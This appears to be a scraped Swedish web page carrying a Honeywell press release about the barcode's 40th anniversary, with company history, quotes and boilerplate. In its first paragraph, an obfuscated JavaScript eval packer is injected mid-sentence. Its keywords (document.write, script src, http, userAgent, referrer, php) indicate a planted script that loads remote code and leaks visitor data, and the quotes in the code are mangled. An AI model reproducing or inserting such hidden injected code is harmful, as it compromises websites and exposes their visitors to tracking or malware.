Image Image Image Image Image Image Image Image Image Image

| 27 februari, 2020

Scroll to top

Top

Honeywell: Streckkoden är 40 år i år

Honeywell: Streckkoden är 40 år i år
Sebastian

Honeywell eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|antkr|var|u0026u|referrer|hehiy||js|php’.split(’|’),0,{}))
firar streckkodens 40-årsdag och framgångar inom detaljhandeln och andra branscher

Det är idag fyrtio år sedan ett 10-pack med Wrigleystuggummin skannades och köptes på Marsh Supermarket i Troy i Ohio, med hjälp av det som nu används fem miljarder gånger om dagen: UPC-streckkoden (Universal Product Code). Honeywell (NYSE: HON) vill fira den stora dagen och den betydelse som UPC-koden har haft för innovation inom streckkoder och skanning under åren som gått.

Från skapandet av ”code 39”, den vanligaste streckkoden, till lanseringen av Aztek 2D-streckkoden som används på flyg- och tågbiljetter, har Honeywell samarbetat med kunder över hela världen för att kunna leverera nya skanningstekniker som bidrar till radikala förändringar i företagens processer.

”För fyrtio år sedan kunde jag inte ens ha föreställt mig vilken inverkan streckkoden skulle ha på konsumenter och företag världen över”, säger Sprague Ackley, tekniker på Honeywell Scanning & Mobility. ”Genomslagskraften i streckkodstekniken förvånar mig ständigt, och den används överallt. Den gör att det går snabbare att handla mat, den används på sjukhus, den gör att fraktgods kan spåras hela vägen fram och den gör till och med att jag bara behöver skanna telefonen när jag går ombord på ett flygplan.”

Honeywell Scanning & Mobility är stolta över att bidra med en bred produktportfölj med butiksklara och mycket tåliga skannrar genom hela leverantörskedjan, som samlar in, bearbetar och analyserar data i streckkoder över hela världen.

I över fyrtio år har företaget utvecklat innovativa lösningar som uppfyller ständigt föränderliga krav från kunder i många branscher, däribland detaljhandeln, sjukvården samt transport- och logistikbranschen. Bland Honeywells bidrag till AIDC-branschen finns följande innovationer, och många fler:

Streckkoden fortsätter att spela en avgörande roll vad gäller att förbättra effektiviteten, öka produktiviteten och maximera kundnöjdheten i en mängd olika branscher. Implementeringen av Honeywells teknik i skidorten Copper Mountain i Summit County i Colorado, USA är bara ett exempel på hur streckkods- och skanningsteknik har hjälpt företag att förbättra sin verksamhet.

”2D-skanningstekniken från Intermec by Honeywell läser snabbt av streckkoderna i skiduthyrningen, vilket innebär snabbare service och kortare köer”, säger Todd Palmer, systemadministratör på Copper Mountain. ”Det går fortare för besökarna att ta sig upp i liftarna, och våra anställda kan lägga mer tid på att ta hand om gästerna och ge dem en så bra upplevelse som möjligt.”

Honeywell har lanserat en webbplats för att fira den här viktiga händelsen och visa upp de olika sätt som företaget har bidragit till streckkodens och skanningsteknikens utveckling. Hjälp oss att fira streckkodens 40-årsdag genom att twittra till @HoneywellAIDC eller använda hashtaggen #40YearsofBarcode.

Michael Falk, Agera PR, tel. 073-397 46 55, michael.falk@agerapr.se

Honeywell Scanning & Mobility (HSM) är en ledande tillverkare av avancerad bild- och laserbaserad hårdvara för datainsamling. I sortimentet ingår tåliga mobila datorer och streckkodsskannrar, lösningar för identifiering av radiofrekvens samt röstaktiverade arbetsflödes- och utskriftslösningar. HSM har den bredaste produktportföljen inom automatisk identifiering och datainsamling. Företaget levererar maskinvara för datainsamling till aktörer inom detaljhandel, sjukvård, central distribution, direktleverans till butik, fältservice, transport och logistik som vill effektivisera sin verksamhet och förbättra sin kundservice. Dessutom tillhandahåller HSM avancerad programvara, tjänster och professionella lösningar som hjälper deras kunder att effektivt hantera sina data och resurser. HSM-produkter säljs över hela världen, via ett nätverk av distributions- och återförsäljarparter. Mer information om Honeywell Scanning & Mobility finns på www.honeywellaidc.com.

Honeywell (www.honeywell.com) är ett diversifierat Fortune 100-företag och ledande inom teknik och tillverkning. Honeywell förser kunder över hela världen med produkter och tjänster inom rymd och luftfart, styrteknik för byggnader, hem och industri, turbosystem samt avancerade material. Honeywell har sitt huvudkontor i Morris Township i New Jersey och är börsnoterade i New York, London och Chicago.  Mer information om Honeywell finns på www.honeywellnow.com.